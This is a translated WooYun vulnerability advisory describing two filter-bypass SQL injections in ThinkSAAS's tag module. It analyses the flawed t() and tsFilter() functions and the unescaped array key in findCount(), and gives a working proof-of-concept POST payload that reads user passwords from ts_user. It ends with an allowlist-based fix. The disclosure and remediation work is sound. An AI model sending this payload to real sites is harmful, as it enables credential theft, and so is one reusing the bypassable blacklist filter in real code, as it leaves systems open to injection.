
Vulnerability summary

Defect ID: wooyun-2014-053384

Title: ThinkSAAS latest version: two more SQL injections by bypassing the filter

Vendor: thinksaas.cn

Author: xfkxfk

Submitted: 2014-03-11 23:13

Fix deadline: 2014-06-09 23:13

Public disclosure: 2014-06-09 23:13

Type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2014-03-11: Details sent to the vendor, awaiting vendor handling
2014-03-12: Vendor confirmed; details visible to the vendor only
2014-03-15: Details opened to third-party security partners
2014-05-06: Details opened to core white hats and domain experts
2014-05-16: Details opened to regular white hats
2014-05-26: Details opened to intern white hats
2014-06-09: Details opened to the public

Summary:

Two more injection points in the latest ThinkSAAS, reached by bypassing the newly added filter.
Unaffected by magic_quotes_gpc; no login required.

Details:

This vulnerability was previously analysed by ′ 雨。 in: WooYun: Thinksaas某处绕过过滤的注射漏洞 (an injection in Thinksaas that bypasses the filter).
The vendor has since released a new version that adds filtering, but the filtering is not strict and can be bypassed to keep injecting.
First point:
The latest code in /app/tag/action/add_ajax.php:

case "do":

    $objname = t($_POST['objname']);
    $idname = tsFilter(t($_POST['idname']));
    $objid = t($_POST['objid']);
    $tags = t($_POST['tags']);

    $new['tag']->addTag($objname,$idname,$objid,$tags);

    echo "<script language=JavaScript>parent.window.location.reload();</script>";

    break;


On top of the original $idname = t($_POST['idname']);, the filter function tsFilter was added.
So there are two layers of filtering here: t() strips a long list of characters, and tsFilter strips injection keywords.

function t($text) {
    $text = preg_replace ( '/\[.*?\]/is', '', $text );
    $text = cleanJs ( $text );
    // strip whitespace completely BY QINIAO
    $text = preg_replace ( '/\s(?=\s)/', '', $text );
    $text = preg_replace ( '/[\n\r\t]/', ' ', $text );
    $text = str_replace ( ' ', ' ', $text );
    // $text = str_replace ( ' ', '', $text );
    $text = str_replace ( '&nbsp;', '', $text );
    $text = str_replace ( '&', '', $text );
    $text = str_replace ( '=', '', $text );
    $text = str_replace ( '-', '', $text );
    $text = str_replace ( '#', '', $text );
    $text = str_replace ( '%', '', $text );
    $text = str_replace ( '!', '', $text );
    $text = str_replace ( '@', '', $text );
    $text = str_replace ( '^', '', $text );
    $text = str_replace ( '*', '', $text );
    $text = str_replace ( 'amp;', '', $text );

    $text = str_replace ( 'position', '', $text );

    $text = strip_tags ( $text );
    $text = htmlspecialchars ( $text );
    $text = str_replace ( "'", "", $text );
    return $text;
}


This one strips characters.

function tsFilter($value){
    $value = trim($value);
    // SQL commands and keywords that may not be submitted
    $words = array();
    $words[] = "add ";
    $words[] = "and ";
    $words[] = "count ";
    $words[] = "order ";
    $words[] = "table ";
    $words[] = "by ";
    $words[] = "create ";
    $words[] = "delete ";
    $words[] = "drop ";
    $words[] = "from ";
    $words[] = "grant ";
    $words[] = "insert ";
    $words[] = "select ";
    $words[] = "truncate ";
    $words[] = "update ";
    $words[] = "use ";
    $words[] = "--";
    $words[] = "#";
    $words[] = "group_concat";
    $words[] = "column_name";
    $words[] = "information_schema.columns";
    $words[] = "table_schema";
    $words[] = "union ";
    $words[] = "where ";
    $words[] = "alert";
    $value = strtolower($value); // convert to lower case
    // one pass per keyword: str_replace does not rescan its own output,
    // so a keyword reassembled by the removal survives
    foreach($words as $word){
        if(strstr($value,$word)){
            $value = str_replace($word,'',$value);
        }
    }

    return $value;
}


This one strips injection keywords.
For t(), we simply avoid using any of the characters it strips.
For tsFilter, we can write "select" as "selselect ect", which gets past the filter.
Now let's look at how addTag handles adding a tag:

function addTag($objname,$idname,$objid,$tags){
    ......
    $tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
        $idname=>$objid,
        'tagid'=>$tagid,
    ));


Here $idname is used as an array key and passed into findCount.

public function findCount($table, $conditions = null) {
    $where = "";
    if (is_array ( $conditions )) {
        $join = array ();
        foreach ( $conditions as $key => $condition ) {
            // only the value is escaped; the key goes into the SQL as-is
            $condition = $this->escape ( $condition );
            $join [] = "{$key} = {$condition}";
        }
        $where = "WHERE " . join ( " AND ", $join );
    } else {
        if (null != $conditions)
            $where = "WHERE " . $conditions;
    }
    $sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
    $result = $this->db->once_fetch_assoc ( $sql );

    return $result ['ts_counter'];
}


Only the value is escaped here; the key is not filtered at all.
Combining the filter bypass above with this analysis, injection is possible directly.
The second injection point is in add.php:

case "do":

    $objname = tsFilter($_POST['objname']);
    $idname = tsFilter($_POST['idname']);
    $objid = intval($_POST['objid']);
    $tags = t($_POST['tags']);

    $new['tag']->addTag($objname,$idname,$objid,$tags);

    tsNotice('标签添加成功!');

    break;


This also calls addTag, but there is no t() here, only a single tsFilter, so injection is even easier.
The rest of the process is the same as the first injection point.

Proof of vulnerability:

Send the request:
URL: http://localhost/thinksaas/index.php?app=tag&ac=add_ajax&ts=do
POST: objid=111111&objname=article&idname=111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a&tags=idname

[Screenshot: 11.png]

[Screenshot: 22.png]

Suggested fix:

Filter strictly.
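As an added example (not ThinkSAAS code) of what strict filtering means for the analysis above: $idname and $objname end up as a column name and part of a table name in findCount(), so an identifier allowlist on the key side is the check to add; the single-pass str_replace blacklist cannot do this job. The function names, the "?" value placeholder in place of $this->escape(), and the sample column names are assumptions, and the dbprefix constant is omitted.

```php
<?php
// Added example, not ThinkSAAS code. Table/column names and function names
// are illustrative; the dbprefix constant used by findCount() is omitted.

// Allowlist check: the key side of "{$key} = {$condition}" in findCount()
// is never escaped, so it must be restricted to a plain SQL identifier.
function tsIdentifier(string $value): string
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $value)) {
        throw new InvalidArgumentException('invalid identifier: ' . $value);
    }
    return $value;
}

// Same WHERE construction as findCount(), but with validated, backtick-quoted
// keys; the value side is shown as a bound-parameter placeholder (assumed)
// instead of the original $this->escape($condition).
function buildCountSql(string $table, array $conditions): string
{
    $join = [];
    foreach ($conditions as $key => $condition) {
        $join[] = '`' . tsIdentifier((string) $key) . '` = ?';
    }
    $where = $join ? 'WHERE ' . implode(' AND ', $join) : '';
    return 'SELECT COUNT(*) AS ts_counter FROM `' . tsIdentifier($table) . "` {$where}";
}

// A legitimate request from add.php (constructed values): idname=articleid.
echo buildCountSql('tag_article_index', ['articleid' => 111, 'tagid' => 5]), PHP_EOL;

// A key containing whitespace or keyword fragments, as in the proof above, is
// rejected before any SQL is built, regardless of what tsFilter() lets through.
try {
    buildCountSql('tag_article_index', ['111 uniunion on' => 111, 'tagid' => 5]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The same tsIdentifier() check applied to $objname before 'tag_'.$objname.'_index' is built closes the table-name side of the same path.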

Copyright notice: when reposting, please credit xfkxfk@WooYun (乌云)


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2014-03-12 13:57

Vendor reply:

Thanks for the submission, a fix is in progress...

Latest status:

None yet